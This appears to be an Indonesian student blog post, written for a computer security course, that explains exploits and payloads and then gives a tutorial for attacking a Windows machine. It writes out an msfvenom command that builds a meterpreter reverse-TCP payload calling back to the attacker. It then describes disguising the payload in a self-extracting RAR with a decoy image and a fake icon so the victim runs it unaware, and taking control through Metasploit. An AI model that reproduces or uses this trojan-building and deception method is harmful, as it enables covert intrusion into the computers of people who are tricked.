Assalammualaikum Wr.Wb,,,
Postingan saya kali ini tentang tutorial Exploid,, Ini merupakan tugas kelompok dari mata kuliah Sistem Keamana Komputer (SKK).
Sebelumnya kita harus mengetahui terlebih dahulu apa sih itu Exploid? dan apa itu Payload?
Berikut adalah pengertian Exploid dan Payload,.
Pengertian Exploit
Exploit adalah sebuah kode yang menyerang keamanan komputer secara spesifik. Exploit banyak digunakan untuk penentrasi baik secara legal ataupun ilegal untuk mencari kelemahan (Vulnerability) pada komputer tujuan. Biasanya exploit mencari kelemahan dari variabel null ataupun variabel yang tidak terdefinisi untuk dimasukkan nilai lain sehingga terjadi error dan tidak membaca prosedur program seperti seharusnya, sehingga shellcode dapat dimasukkan untuk melaksanakan perintah atau command lainnya. Exploit biasa disisipi dengan shellcode.
Payload
Payload dalam dunia security yaitu pembawa exploit yang digunakan untuk mengeksekusi shellcode. Payload kemudian akan menjalankan shellcode yang dipilih pada target komputer untuk mendapatkan akses kedalam komputer tujuan (target).
Shellcode
Shellcode adalah kode yang digunakan dengan payload untuk mengeksploitasi komputer target. Biasanya shellcode dibuat untuk dapat mengontrol komputer, ataupun mendapatkan hak akses komputer target, atau yang lainnya. Shellcode dimasukkan kedalam kode exploit dengan tujuan membaypass fungsi suatu software, sehingga software tersebut tidak berjalan secara semestinya, melainkan menjalankan fungsi pada Shellcode.
Vulnerability
Dalam system security komputer, istilah Vulnerability merupakan suatu kelemahan yang memungkinkan seseorang untuk masuk dan mendapatkan hak akses kedalam komputer yang dituju(target). Biasanya vulnerability adalah kelemahan yang dikarenakan kesalahan setting ataupun ataupun ketidaktahuan administrator.
Cara melakukan Exploit
1.
Pertama kita harus
mengetahui IP yang kita gunakan sebagai host untuk exploit ini
Sintax : ip addr show
2. Seterusnya Membuat
file payload-nya
contoh Sintax : msfvenom
–p windows/meterpreter_reverse_tcp LHOST 192.168.1.12 LPORT=4444 –f exe >
contoh.exe
3.
Setelah file dibuat, kita bisa membuat sedikit tipu helah
agar payload kita tidak ketahuan(agar orang membuka payload tanpa sadar)
a.
Membuat icon
Lalu download icon yang sudah dibuat.
Ø Blok file payload dan pengecoh, klik kanan lalu ADD to archive
b. Membuat file rar tipuan
Bahannya : 1. File payload yang kita buat
tadi
2. satu file yang menjadi pengecoh (gambar,video,dll)
3.
icon yang kita buat tadi
Lalu ikuti langkah-langkah seperti dibawah
ini :
Ø Blok file payload dan pengecoh, klik kanan lalu ADD to archive
Ø Pada menu General, centangpada “ create SFX archive” danpada
compression method –nyapilih “best”
Ø Pada Menu Advanced, klikpada “SFX options”
ØPada menu setup, masukkan nama kedua file yang di blok tadi pada
“run after extraction”
Ø Lalu pada menu Text and Icon, masukkan icon yang tadi kita buat pada “load SFX icon from file”lalu klik “OK”
Ø
Tara!!! File tipuan telah jadi, dan siap
di kontribusikan pada target, Dan ketika file ini di buka atau di extract, dia akan
membuka/merunning otomatis file gambar (pengecoh) dan file payload yang kita buat
tadi, dan si target akan terkecoh dengan gambar tanpa menyadari telah merunning
file payload kita.
c. Setelah file exploit kita sudah di buka target, untuk mengexploitase
pc/laptop korban, lakukan pada terminal kali linux dan menggunakan tool
“Metasploit” dengan cara masukkan sintax seperti di bawah ini :
Lalu ketik sintax :exploit
Jreng-jreng-jreng setelah pc/laptop
target telah terbaca, kita dapat mengexploitase pc/laptop target.
Misalnya untuk membaca system
pc/laptop target kita dapat menggunakan
sintax : sysinfo
